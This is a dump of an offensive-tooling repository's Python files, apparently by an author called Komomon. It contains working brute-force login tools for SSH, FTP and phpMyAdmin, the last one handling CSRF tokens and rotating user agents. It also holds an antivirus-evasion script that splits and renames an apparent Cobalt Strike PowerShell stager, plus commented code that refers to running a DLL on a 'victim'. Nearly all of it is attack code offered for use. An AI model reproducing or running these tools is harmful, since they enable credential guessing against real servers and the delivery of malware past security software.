error!") 61 | exit(1) 62 | # 多 IP 情况 63 | elif ipfile is not None: 64 | if userfile is not None and passfile is not None: 65 | with open(ipfile, 'r') as e: 66 | with open(userfile, 'r') as f: 67 | with open(passfile, 'r') as g: 68 | for ipline in e: 69 | for userline in f: 70 | for passline in g: 71 | self.queue.put((ipline.strip(), userline.strip(), passline.strip())) 72 | # print((ipline.strip(), userline.strip(), passline.strip())) 73 | elif username is not None and passfile is not None: 74 | with open(ipfile, 'r') as e: 75 | with open(passfile, 'r') as g: 76 | for ipline in e: 77 | for passline in g: 78 | self.queue.put((ipline.strip(), username, passline.strip())) 79 | # print((ip, username, passline.strip())) 80 | elif username is not None and password is not None: 81 | with open(ipfile, 'r') as e: 82 | for ipline in e: 83 | self.queue.put((ipline.strip(), username, password)) 84 | # print((ipline.strip(), username, password)) 85 | else: 86 | print("params set error!") 87 | exit(1) 88 | 89 | def ssh_bruster(self, ip, port, username, password, timeout=5): 90 | # pass 91 | try: 92 | print('[*] try login ssh {}@{}:{} .....'.format(username, ip, port)) 93 | ssh_ob = paramiko.SSHClient() 94 | # 创建一个ssh的白名单 paramiko.AutoAddPolicy() 95 | # #加载创建的白名单 96 | ssh_ob.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 97 | # compress 启用压缩 98 | ssh_ob.connect(ip, port=int(port), username=username, password=password, compress=True, 99 | timeout=timeout) 100 | stdin, stdout, stderr = ssh_ob.exec_command("whoami") # stdin为输入,stdout为正确输出,stderr为错误输出,同时只有一个变量有值。 101 | # print('[+] Login successfully') 102 | print('[+] Success, {}:{}, username:{}, password:{}, whoami:{}'.format(ip, port, username, password, 103 | stdout.read().decode('utf-8'))) 104 | self.ip_success_list.append(ip) 105 | # self.ssh.close() 106 | return ip 107 | except Exception as e: 108 | # 调试的时候打开下面这句看是什么错误 如果登录不成功会显示如下错误授权失败 Error: Authentication failed. 
109 | # print("Error:", e) 110 | ssh_ob.close() 111 | return None 112 | 113 | 114 | # 多线程+ 115 | def start(self): 116 | while not self.queue.empty(): 117 | ip, username, password = self.queue.get() 118 | # 加一个列表,当IP爆破成功后,将IP加入列表,防止其他线程再爆破。 119 | if ip in self.ip_success_list: 120 | pass 121 | else: 122 | self.ssh_bruster(ip=ip, port=self.port, username=username, password=password, timeout=self.timeout) 123 | 124 | 125 | if __name__ == '__main__': 126 | usage = """ 127 | SSH bruster By komomon 128 | python test32.py -H 192.168.148.128 --user root -pf asdf.txt 129 | python test32.py -H 192.168.148.128 -uf user.txt -pf pass.txt 130 | python test32.py -H 192.168.148.128 -p 222 -uf user.txt -pf pass.txt 131 | python test32.py -H 192.168.148.128 -p 222 -uf user.txt -pf pass.txt -t 50 --timeout=10 132 | python test32.py -if ipfile.txt -p 222 -uf user.txt -pf pass.txt -t 50 --timeout=10 133 | """ 134 | parser = argparse.ArgumentParser(usage=usage, description="des") 135 | parser.add_argument("-H", "--host", type=str, dest="host", help="Hosts to scan") 136 | parser.add_argument("-if", "--ipfile", type=str, dest="ipfile", help="IP file") 137 | parser.add_argument("-p", "--port", type=int, dest="port", default=22, help="Port to scan") 138 | parser.add_argument("--user", type=str, dest="username", help="Username") 139 | parser.add_argument("--pass", type=str, dest="password", help="Password") 140 | parser.add_argument("-uf", "--userfile", type=str, default=None, dest="userfile", help="Username file") 141 | parser.add_argument("-pf", "--passfile", type=str, default=None, dest="passfile", help="Password file") 142 | parser.add_argument("-t", "--threads", type=int, default=10, dest="threads", help="Threads") 143 | parser.add_argument("--timeout", type=int, default=5, dest="timeout", help="Request timeout") 144 | args = parser.parse_args() 145 | 146 | Host = args.host 147 | Port = args.port 148 | Ipfile = args.ipfile 149 | Username = args.username 150 | Password = args.password 
151 | Userfile = args.userfile 152 | Passfile = args.passfile 153 | Thread_maxnum = args.threads 154 | Timeout = args.timeout 155 | print("Bruster bot is running...") 156 | # print(Passfile) 157 | MY_QUEUE = Queue() 158 | thread_list = [] 159 | if args.timeout != 0 and args.timeout > 0: 160 | timeout = args.timeout 161 | else: 162 | print("--timeout Setting error.") 163 | exit(1) 164 | bruster_bot = Mybruster(ip=Host, ipfile=Ipfile, port=Port, queue=MY_QUEUE, username=Username, password=Password, 165 | userfile=Userfile, passfile=Passfile, timeout=Timeout) 166 | 167 | for i in range(Thread_maxnum): 168 | # 注意target参数没有(),有()会线程卡死,应该是根据名称去起线程执行函数 169 | thread = threading.Thread(target=bruster_bot.start) 170 | thread_list.append(thread) 171 | for thread in thread_list: 172 | thread.start() 173 | for thread in thread_list: 174 | thread.join() 175 | -------------------------------------------------------------------------------- /Mybruster_ftp 函数版.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | 5 | import ftplib 6 | import threading 7 | import argparse 8 | 9 | 10 | def ftpcrack(host, username, password): 11 | ftp = ftplib.FTP() 12 | try: 13 | ftp.connect(host, 21, 2) 14 | ftp.login(username, password) 15 | ftp.retrlines('LIST') 16 | ftp.quit() 17 | print("{} succeed username{} password {}".format(host, username, password)) 18 | return True 19 | except ftplib.all_errors as e: 20 | pass 21 | 22 | 23 | def main(): 24 | parser = argparse.ArgumentParser() 25 | parser.add_argument('host', help='please host you want to crack ,eg:127.0.0.1') 26 | parser.add_argument('userlist', help='userlist eag:user.txt') 27 | parser.add_argument('passlist', help='passlist eg:pass.txt') 28 | args = parser.parse_args() 29 | 30 | host = args.host 31 | 32 | userfile = args.userlist 33 | 34 | passfile = args.passlist 35 | 36 | userf = open(userfile, 'r') 37 | passf = open(passfile, 'r') 38 | for 
line in userf.readlines(): 39 | username = line.strip() 40 | for line in passf.readlines(): 41 | password = line.strip() 42 | t = threading.Thread(target=ftpcrack, args=(host, username, password)) 43 | t.start() 44 | 45 | 46 | if __name__ == "__main__": 47 | main() 48 | -------------------------------------------------------------------------------- /Mybruster_phpmyadmin.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | from html import unescape 4 | import random 5 | import argparse 6 | import threading 7 | import time 8 | from queue import Queue 9 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 10 | 11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 12 | 13 | ''' 14 | 15 | 对PhpMyadmin接口爆破程序,支持自定义线程,路径,字典,端口,支持https 16 | 多线程,生产者消费者模型,可以实现指定username,userfile password,passfile 自定义超时时间,线程数 17 | ''' 18 | 19 | ''' 20 | phpmyadmin 有token,所以要先访问一下页面获得token,对应字段为响应的set-cookie的phpmyadmin字段, 21 | 注意第一个为了获得token所以第一次尝试登陆的时候也要是post请求,get请求不行。 22 | 23 | 最初想法:每次发一个空包,获取token,然后再发爆破包,如果多线程爆破的话,token用一次就失效了,所以那种情况只能串行 24 | 后面改进:第一次发一个空包,username,password都为空的post包,为此session获取一个token, 25 | 然后每次爆破初始化这个session的title和token,这样就不用每爆破一次,要发两个包了。 26 | 问题: 27 | 另外,由于所有线程共用一个session,所以当有一个线程爆破进去之后,可能出现这个token是正确的, 28 | 所以可能会直接跳转进去,导致re不能匹配到指定字段,既不能不能获得token字段,使得获取list[0]时越界, 29 | 所以其他线程不知道已经爆破成功了,没有终止,匹配不到对应标签,也就获取不到指定的token字段, 30 | 所以在线程产生IndexError的时候,让他停止, 31 | 但是这样有个坏处就是,如果是因为不可达,而访问不到可能不知道是否是程序的问题。 32 | ''' 33 | 34 | 35 | class Mybruster_phpmyadmin: 36 | def __init__(self, url=None, queue=None, username=None, password=None, userfile=None, passfile=None,timeout=5): 37 | self.url = url 38 | self.queue = queue 39 | self.username = username 40 | self.password = password 41 | self.userfile = userfile 42 | self.passfile = passfile 43 | self.timeout = timeout 44 | self.session = requests.session() 45 | self.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 46 | 
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'} 47 | self.post_data = {'pma_username': None, 'pma_password': None, "server": 1, "target": "index.php", "token": None} 48 | # 生产者 初始化执行 49 | self.title, self.token = self.get_title_and_token() 50 | self.get_data_from_file(self.username,self.password,self.userfile,self.passfile) 51 | # 生成随机UA 52 | def random_useragent(self): 53 | USER_AGENTS = [ 54 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 55 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", 56 | "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 57 | "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", 58 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)", 59 | "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)", 60 | "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)", 61 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)", 62 | "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6", 63 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1", 64 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0", 65 | "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5", 66 | "Mozilla/5.0 (X11; U; Linux i686; en-US; 
rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6", 67 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", 68 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20", 69 | "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52", 70 | ] 71 | return random.choice(USER_AGENTS) 72 | 73 | # def read_data(self): 74 | # 初始化执行一次就可以了,为了获得初始token 75 | def get_title_and_token(self): 76 | res = self.session.post(url=self.url, headers=self.headers, data=self.post_data, timeout=self.timeout) 77 | title = re.findall("(.*?)", res.text) 78 | token = re.findall(r'', res.text) 79 | token = unescape(token) # html实体解码 80 | # print(title, token) 81 | return [title, token] 82 | 83 | # 获取数据传入管道 84 | def get_data_from_file(self, username=None, password=None, userfile=None, passfile=None): 85 | if userfile is not None and passfile is not None: 86 | with open(userfile, 'r') as f: 87 | with open(passfile, 'r') as g: 88 | for userline in f: 89 | for passline in g: 90 | self.queue.put((userline.strip(), passline.strip())) 91 | # print((userline.strip(), passline.strip())) 92 | elif username is not None and passfile is not None: 93 | with open(passfile, 'r') as g: 94 | for passline in g: 95 | self.queue.put((username, passline.strip())) 96 | # print((username, passline.strip())) 97 | elif username is not None and password is not None: 98 | self.queue.put((username, password)) 99 | else: 100 | print("params set error!") 101 | exit(1) 102 | 103 | def requestt(self, username, password): 104 | # res1 = self.session.post(url=self.url, headers=headers, data=self.post_data) 105 | # title1 = re.findall("(.*?)", res1.text) 106 | # token1 = re.findall(r'', res1.text)[0] 107 | # token1 = unescape(token) # html实体解码 108 | post_data = {'pma_username': username, 'pma_password': password, "server": 1, "target": "index.php", 109 | "token": self.token} 
110 | # print(post_data) 111 | res2 = self.session.post(url=self.url, headers=self.headers, data=post_data, timeout=self.timeout) 112 | # print(res2.status_code) 113 | title2 = re.findall("(.*?)", res2.text) 114 | # print(res2.text) 115 | # exit(1) 116 | # time.sleep(2) 117 | # print(title2) 118 | if title2 != self.title: 119 | print("Success:", "username:", username, ',', "password:", password) 120 | self.queue.queue.clear() # 爆破成功清空队列 121 | exit(0) 122 | else: 123 | # 当有一个线程爆破成功后,好像这个session就进去了,导致匹配不到下面的字段,所以,会报列表越界,加个try强制跳过吧。 124 | try: 125 | token2 = re.findall(r'', res2.text)[0] 126 | token2 = unescape(token2) # html实体解码 127 | self.title, self.token = title2, token2 128 | except IndexError: 129 | # pass 130 | exit(1) 131 | 132 | # 多线程+ 133 | def start(self): 134 | while not self.queue.empty(): 135 | username, password = self.queue.get() 136 | self.requestt(username, password) 137 | 138 | 139 | if __name__ == '__main__': 140 | usage = """ 141 | phpmyadmin bruter By Komomon. 142 | python3 test31.py -u http://192.168.148.136:81/phpMyAdmin/index.php --user root -pf asdf.txt 143 | python3 test31.py -u http://192.168.148.136:81/phpMyAdmin/index.php --uf qwer.txt -pf asdf.txt 144 | python test31.py -u http://192.168.148.136:81/phpMyAdmin/index.php --user root -pf asdf.txt -t 50 145 | python test31.py -u http://192.168.148.136:81/phpMyAdmin/index.php --user root -pf asdf.txt --timeout 10 146 | 可以实现指定username,userfile password,passfile 自定义超时时间,线程数 147 | """ 148 | parser = argparse.ArgumentParser(usage=usage, description="") 149 | parser.add_argument("-u", "--url", type=str, default=None, dest="url", help="URL") 150 | parser.add_argument("--user", type=str, default=None, dest="username", help="Username") 151 | parser.add_argument("--pass", type=str, default=None, dest="password", help="Password") 152 | parser.add_argument("-uf", "--userfile", type=str, default=None, dest="userfile", help="Username file") 153 | parser.add_argument("-pf", "--passfile", type=str, 
default=None, dest="passfile", help="Password file") 154 | parser.add_argument("-t", "--threads", type=int, default=10, dest="threads", help="Threads") 155 | parser.add_argument("--timeout", type=int, default=5, dest="timeout", help="Request timeout") 156 | # parser.add_argument("--timeout", type=int, default=2, dest="timeout", help="Request timeout") 157 | args = parser.parse_args() 158 | Url = args.url 159 | Username = args.username 160 | Password = args.password 161 | Userfile = args.userfile 162 | Passfile = args.passfile 163 | Thread_maxnum = args.threads 164 | Timeout = args.timeout 165 | print("Bruster bot is running...") 166 | print("Url: %s" %Url) 167 | MY_QUEUE = Queue() 168 | thread_list = [] 169 | if args.timeout != 0 and args.timeout > 0: 170 | timeout = args.timeout 171 | else: 172 | print("--timeout Setting error.") 173 | exit(1) 174 | bruster_bot = Mybruster_phpmyadmin(url=Url, queue=MY_QUEUE,username=Username, password=Password, userfile=Userfile, passfile=Passfile, timeout=Timeout) 175 | 176 | for i in range(Thread_maxnum): 177 | # 注意target参数没有(),有()会线程卡死,应该是根据名称去起线程执行函数 178 | thread = threading.Thread(target=bruster_bot.start) 179 | thread_list.append(thread) 180 | # print(thread_list) 181 | # print(thread_list) 182 | for thread in thread_list: 183 | thread.start() 184 | for thread in thread_list: 185 | thread.join() 186 | 187 | -------------------------------------------------------------------------------- /Mybruster_phpmyadmin单线程版.py: -------------------------------------------------------------------------------- 1 | from requests import session 2 | from re import findall 3 | from html import unescape 4 | 5 | target = "http://192.168.148.136:81/phpMyAdmin/index.php" 6 | user = "root" 7 | passdic = "asdf.txt" 8 | ss = session() 9 | ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 10 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'} 11 | 12 | 
13 | def get_token(text) -> str: 14 | token = findall("name=\"token\" value=\"(.*)\" />", text) 15 | return unescape(token[0]) if token else None 16 | 17 | 18 | def get_title(text) -> str: 19 | title = findall("(.*)", text) 20 | return title[0] if title else None 21 | 22 | 23 | def try_login(user, pwd, token): 24 | data = {"pma_username": user, 25 | "pma_password": pwd, 26 | "server": 1, 27 | "target": "index.php", 28 | "token": token} 29 | r = ss.post(url=target, data=data) 30 | return r.text 31 | 32 | 33 | def fuck_pma(): 34 | with open(passdic, "r", encoding="utf-8") as f: 35 | html = try_login("", "", "") 36 | title_fail = get_title(html) 37 | token = get_token(html) 38 | for line in f: 39 | pwd = line.strip() 40 | html = try_login(user, pwd, token) 41 | title = get_title(html) 42 | token = get_token(html) 43 | if title != title_fail: 44 | print(f"{user} {pwd} 登录成功 {title}") 45 | # with open("success.txt", "a", encoding="utf-8") as f: 46 | # f.write(f"{target} {user} {pwd}\n") 47 | # break 48 | else: 49 | print(f"{user} {pwd} 登陆失败 {title}") 50 | 51 | 52 | if __name__ == "__main__": 53 | try: 54 | fuck_pma() 55 | except Exception as e: 56 | print(e) 57 | -------------------------------------------------------------------------------- /MybypassAV_ps1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # author: Komomon(github) 3 | import sys 4 | import random 5 | import string 6 | import os 7 | import time 8 | import platform 9 | import argparse 10 | import re 11 | import base64 12 | 13 | 14 | ''' 15 | 目前实现,部分变量名称随机化替换 16 | payload部分转为字节数组,随机化分割,再拼接 17 | todo: 18 | 所有变量或关键词的随机化 19 | ''' 20 | 21 | # a-zA-Z 生成一个长度为8-15的字符串 22 | def get_random_string(): 23 | # With combination of lower and upper case 24 | length = random.randint(8, 15) 25 | result_str = ''.join(random.choice(string.ascii_letters) for i in range(length)) 26 | # print random string 27 | return result_str 28 | 29 | 30 | def xor(data): 31 | 
key = get_random_string() 32 | l = len(key) 33 | output_str = "" 34 | flag = 0 35 | for i in range(len(data)): 36 | current = data[i] 37 | current_key = key[i % len(key)] 38 | o = lambda x: x if isinstance(x, int) else ord(x) # 处理字节而不是字符串的数据 ord()函数主要用来返回对应字符的ascii码 39 | output_str += chr(o(current) ^ ord(current_key)) # 异或运算并加到一起 40 | ciphertext = "" 41 | for x in output_str: 42 | ciphertext += hex(ord(x)) + ", " 43 | flag += 1 44 | if flag == 15: 45 | ciphertext += "\n" 46 | flag = 0 47 | ciphertext = "{ " + ciphertext + "0x00};" 48 | # ciphertext = '{ ' + ', '.join(hex(ord(x)) for x in output_str) + ', 0x00};' # 16进制结果拼接到数组中,hex(ord("x"))=0x78 取后两位 49 | # print(ciphertext) 50 | # ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in output_str) + ', 0x00};' # hex(ord("x"))=0x78 取后两位 51 | # print(ciphertext) 52 | return ciphertext, key 53 | 54 | 55 | def list_random_slice(data_list): 56 | slice_num = random.randint(5, 15) 57 | result_list = [] 58 | length = len(data_list) 59 | step = length // slice_num 60 | # 排除最后会余几个的情况,毕竟上面是四舍运算 61 | if step*slice_num >=length: 62 | pass 63 | else: 64 | slice_num += 1 65 | 66 | for n in range(0, length, step): 67 | # random_num = random.randint(1, length) 68 | result_list.append(data_list[n:n+step]) 69 | # index += random_num 70 | # length = length - random_num 71 | # print(result_list) 72 | return result_list, slice_num 73 | 74 | 75 | def ps1_bypassAV(payload_file): 76 | try: 77 | # print(1) 78 | original = open(payload_file, "rt") # 读取为字节以处理字符集解析问题 79 | data = original.read() 80 | # print(2) 81 | except Exception as e: 82 | print("err:", e) 83 | print("[*] Failed to read " + payload_file + " :( [*]") 84 | print("[*] Missing " + payload_file + " in pwd? 
[*]") 85 | sys.exit(1) # exit if read failed 86 | # print(3) 87 | # get base64 payload 88 | payload_base64 = re.findall(r"\[System.Convert]::FromBase64String\('(.*?)'\)", data)[0] 89 | # print(payload) 90 | byte_data = bytearray(base64.b64decode(payload_base64)) 91 | # print(byte_data) 92 | byte_list = [] 93 | # payload_type_str_list = [] 94 | for i in byte_data: 95 | # baselist2.append(ord(i)) 96 | byte_list.append(i) 97 | payload_byte_list, slice_num = list_random_slice(byte_list) 98 | # print(slice_num) 99 | # print("result", result) 100 | # print(byte_list) 101 | payload_slice_names = [] 102 | payload = '' 103 | # 生成分片变量名字 104 | for i in range(slice_num): 105 | payload_slice_names.append(get_random_string()) 106 | # 生成多个payload的分片ps1 代码 107 | for sublist in payload_byte_list: 108 | # [Byte[]]$var_c1 = [Byte[]](31,42,160,68,249) 109 | # print(sublist) 110 | payload += "[Byte[]]$" + payload_slice_names[payload_byte_list.index(sublist)] +" = [Byte[]](" + ",".join(str(byte) for byte in sublist) + ")\n\t" 111 | # exit(0) 112 | # payload_name = get_random_string() 113 | payload = payload + "\n\t[Byte[]]$var_code = " + " + ".join("$"+x for x in payload_slice_names) 114 | # payload_byte_str = "(" + ",".join(str(byte) for byte in byte_list) + ")" 115 | # for byte in byte_list: 116 | # payload_byte_str += byte 117 | # print(payload) 118 | 119 | # payload = "[Byte[]]" + payload_byte_str 120 | # data = data.replace(payload_base64,) 121 | data = re.sub(r"\[Byte\[]]\$var_code = \[System.Convert]::FromBase64String\('(.*?)'\)", payload, data, 1) 122 | # payload = re.findall(r"\[System.Convert]::FromBase64String\('(.*?)'\)", data)[0] 123 | # print(data) 124 | # data = data.replace("[System.Convert]::FromBase64String", "[Byte[]]") 125 | 126 | func_fgpa_name = get_random_string() 127 | func_fgdt_name = get_random_string() 128 | var_str = get_random_string() 129 | param_x_name = get_random_string() 130 | resultps1_name = get_random_string() 131 | 132 | data = 
data.replace("func_get_proc_address", func_fgpa_name) 133 | data = data.replace("func_get_delegate_type", func_fgdt_name) 134 | data = data.replace("$var_", "$" + var_str) 135 | data = data.replace("$x", "$" + param_x_name) 136 | 137 | original.close() 138 | # resultps1_name = "resultps1_name" 139 | resultps1 = open(resultps1_name + ".ps1", "w+") 140 | resultps1.write(data) 141 | time.sleep(1) 142 | print("[*] " + resultps1_name + ".ps1 generated! [*]") 143 | print("[*] Usage: powershell -ExecutionPolicy bypass -File .\\" + resultps1_name + ".ps1 generated! [*]") 144 | time.sleep(1) 145 | resultps1.close() 146 | return resultps1_name + ".ps1" 147 | 148 | 149 | 150 | 151 | # ps1_bypassAV("csps64.ps1") 152 | 153 | # 154 | # def main(beaconbin_file): 155 | # # print(banner) 156 | # 157 | # time.sleep(3) 158 | # try: 159 | # print("[*] Initialising charlotte() [*]") 160 | # time.sleep(1) 161 | # e1 = charlotte(beaconbin_file) 162 | # except Exception as e: 163 | # print("EEEE:", e) 164 | # print("[*] charlotte() failed? :( [*]") 165 | # sys.exit(1) # exit if code generation failed 166 | # print("[*] Completed - Compiling " + e1 + ".dll [*]") 167 | # time.sleep(1) 168 | # if platform.system() == "Windows": 169 | # print('windows') 170 | # print('windows 自行编译') 171 | # elif platform.system() == "Linux": 172 | # print('linux') 173 | # try: 174 | # # os.system("x86_64-w64-mingw32-g++ -shared -o charlotte.dll charlotte.cpp -fpermissive >/dev/null 2>&1") 175 | # os.system("x86_64-w64-mingw32-g++ -shared -o " + e1 + ".dll " + e1 + ".cpp -fpermissive >/dev/null 2>&1") 176 | # print("[*] Cross Compile Success! [*]") 177 | # except: 178 | # print("[*] Compilation failed :( [*]") 179 | # time.sleep(1) 180 | # # print("[*] Removing charlotte.cpp... 
[*]") 181 | # # os.system("rm " + e1 + ".cpp") 182 | # # time.sleep(1) 183 | # 184 | # print("[*] Execute on your Windows x64 victim with: [*]") 185 | # print("[*] rundll32 " + e1 + ".dll, " + e1 + " [*]") 186 | # time.sleep(2) 187 | # print("\n") 188 | # 189 | # 190 | if __name__ == "__main__": 191 | banner = """ 192 | Miansha Ps1 Write By Komomon 193 | """ 194 | print(banner) 195 | parser = argparse.ArgumentParser(usage="", description="des") 196 | parser.add_argument("-f", "--file", type=str, dest="file", required=True, help="The powershell file") 197 | # parser.add_argument("--port", type=int, dest="port", default=22, help="ports to scan") 198 | # parser.add_argument("-t", "--timeout", type=int, default=10, dest="timeout", help="Request timeout") 199 | # parser.add_argument("-u", "--user", type=str, required=True, dest="username", help="Username") 200 | # parser.add_argument("-p", "--pass", type=str, required=True, dest="password", help="Password") 201 | args = parser.parse_args() 202 | ps1_file = args.file 203 | # ps1_bypassAV("csps64.ps1") 204 | ps1_bypassAV(ps1_file) -------------------------------------------------------------------------------- /MybypassAV_ps1初版.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # author: Komomon(github) 3 | import sys 4 | import random 5 | import string 6 | import os 7 | import time 8 | import platform 9 | import argparse 10 | import re 11 | import base64 12 | 13 | 14 | ''' 15 | 目前实现,部分变量名称随机化替换 16 | payload部分转为字节数组 17 | todo: 18 | 字节数组随机化分割,再拼接 19 | 所有变量或关键词的随机化 20 | ''' 21 | 22 | 23 | # a-zA-Z 生成一个长度为8-15的字符串 24 | def get_random_string(): 25 | # With combination of lower and upper case 26 | length = random.randint(8, 15) 27 | result_str = ''.join(random.choice(string.ascii_letters) for i in range(length)) 28 | # print random string 29 | return result_str 30 | 31 | 32 | # def get 33 | 34 | 35 | def xor(data): 36 | key = get_random_string() 37 | l = len(key) 
38 | output_str = "" 39 | flag = 0 40 | for i in range(len(data)): 41 | current = data[i] 42 | current_key = key[i % len(key)] 43 | o = lambda x: x if isinstance(x, int) else ord(x) # 处理字节而不是字符串的数据 ord()函数主要用来返回对应字符的ascii码 44 | output_str += chr(o(current) ^ ord(current_key)) # 异或运算并加到一起 45 | ciphertext = "" 46 | for x in output_str: 47 | ciphertext += hex(ord(x)) + ", " 48 | flag += 1 49 | if flag == 15: 50 | ciphertext += "\n" 51 | flag = 0 52 | ciphertext = "{ " + ciphertext + "0x00};" 53 | # ciphertext = '{ ' + ', '.join(hex(ord(x)) for x in output_str) + ', 0x00};' # 16进制结果拼接到数组中,hex(ord("x"))=0x78 取后两位 54 | # print(ciphertext) 55 | # ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in output_str) + ', 0x00};' # hex(ord("x"))=0x78 取后两位 56 | # print(ciphertext) 57 | return ciphertext, key 58 | 59 | 60 | # def list_random_slice(data_list): 61 | # slice_num = random.randint(5, 10) 62 | # result_list = [] 63 | # length = len(data_list) 64 | # step = length // slice_num 65 | # 66 | # for n in range(0, length, step): 67 | # # random_num = random.randint(1, length) 68 | # result_list.append(data_list[n:n + step]) 69 | # # index += random_num 70 | # # length = length - random_num 71 | # # print(result_list) 72 | # return result_list 73 | 74 | 75 | def charlotte(payload_file): 76 | try: 77 | # print(1) 78 | original = open(payload_file, "rt") # 读取为字节以处理字符集解析问题 79 | data = original.read() 80 | # print(2) 81 | except Exception as e: 82 | print("err:", e) 83 | print("[*] Failed to read " + payload_file + " :( [*]") 84 | print("[*] Missing " + payload_file + " in pwd? 
[*]") 85 | sys.exit(1) # exit if read failed 86 | # print(3) 87 | # get base64 payload 88 | payload_base64 = re.findall(r"\[System.Convert]::FromBase64String\('(.*?)'\)", data)[0] 89 | # print(payload) 90 | byte_data = bytearray(base64.b64decode(payload_base64)) 91 | # print(byte_data) 92 | byte_list = [] 93 | # payload_type_str_list = [] 94 | for i in byte_data: 95 | # baselist2.append(ord(i)) 96 | byte_list.append(i) 97 | # payload_type_str_list = list_random_slice(byte_list) 98 | # print("result", result) 99 | # print(byte_list) 100 | 101 | payload_byte_str = "(" + ",".join(str(byte) for byte in byte_list) + ")" 102 | # for byte in byte_list: 103 | # payload_byte_str += byte 104 | print(payload_byte_str) 105 | payload = "[Byte[]]" + payload_byte_str 106 | # data = data.replace(payload_base64,) 107 | data = re.sub(r"\[System.Convert]::FromBase64String\('(.*?)'\)", payload, data, 1) 108 | # payload = re.findall(r"\[System.Convert]::FromBase64String\('(.*?)'\)", data)[0] 109 | # print(data) 110 | # data = data.replace("[System.Convert]::FromBase64String", "[Byte[]]") 111 | 112 | func_fgpa_name = get_random_string() 113 | func_fgdt_name = get_random_string() 114 | var_str = get_random_string() 115 | param_x_name = get_random_string() 116 | resultps1_name = get_random_string() 117 | 118 | data = data.replace("func_get_proc_address", func_fgpa_name) 119 | data = data.replace("func_get_delegate_type", func_fgdt_name) 120 | data = data.replace("$var_", "$" + var_str) 121 | data = data.replace("$x", "$" + param_x_name) 122 | 123 | original.close() 124 | resultps1_name = "resultps1_name" 125 | resultps1 = open(resultps1_name + ".ps1", "w+") 126 | resultps1.write(data) 127 | time.sleep(1) 128 | print("[*] " + resultps1_name + ".ps1 generated! 
[*]") 129 | time.sleep(1) 130 | resultps1.close() 131 | return resultps1_name + ".ps1" 132 | 133 | 134 | charlotte("csps64.ps1") 135 | 136 | # 137 | # def main(beaconbin_file): 138 | # # print(banner) 139 | # 140 | # time.sleep(3) 141 | # try: 142 | # print("[*] Initialising charlotte() [*]") 143 | # time.sleep(1) 144 | # e1 = charlotte(beaconbin_file) 145 | # except Exception as e: 146 | # print("EEEE:", e) 147 | # print("[*] charlotte() failed? :( [*]") 148 | # sys.exit(1) # exit if code generation failed 149 | # print("[*] Completed - Compiling " + e1 + ".dll [*]") 150 | # time.sleep(1) 151 | # if platform.system() == "Windows": 152 | # print('windows') 153 | # print('windows 自行编译') 154 | # elif platform.system() == "Linux": 155 | # print('linux') 156 | # try: 157 | # # os.system("x86_64-w64-mingw32-g++ -shared -o charlotte.dll charlotte.cpp -fpermissive >/dev/null 2>&1") 158 | # os.system("x86_64-w64-mingw32-g++ -shared -o " + e1 + ".dll " + e1 + ".cpp -fpermissive >/dev/null 2>&1") 159 | # print("[*] Cross Compile Success! [*]") 160 | # except: 161 | # print("[*] Compilation failed :( [*]") 162 | # time.sleep(1) 163 | # # print("[*] Removing charlotte.cpp... 
